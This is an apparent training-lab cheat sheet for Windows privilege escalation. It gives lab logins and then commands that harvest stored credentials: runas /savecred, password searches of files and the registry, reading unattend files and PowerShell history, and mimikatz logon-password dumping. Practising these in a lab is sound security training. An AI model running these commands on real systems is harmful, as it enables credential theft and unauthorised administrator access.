⚠️ Pracivo Security Lab — Windows privilege escalation techniques. Start as low-privilege user, escalate to SYSTEM or Administrator.
Lab Credentials: ram / pracivo | alice / alice123 | administrator / Admin@2024 (goal: escalate to this)
Stored Credentials
PRIVILEGE ESCALATION / LATERAL MOVEMENT
cmdkey /list
runas /savecred /user:CORP\administrator "cmd.exe"
dir /s /b *pass* *cred* *vnc* *.config 2>nul
findstr /si password *.xml *.ini *.txt *.config
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattended.xml
type C:\Windows\system32\sysprep\sysprep.xml
dir /s SAM 2>nul
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords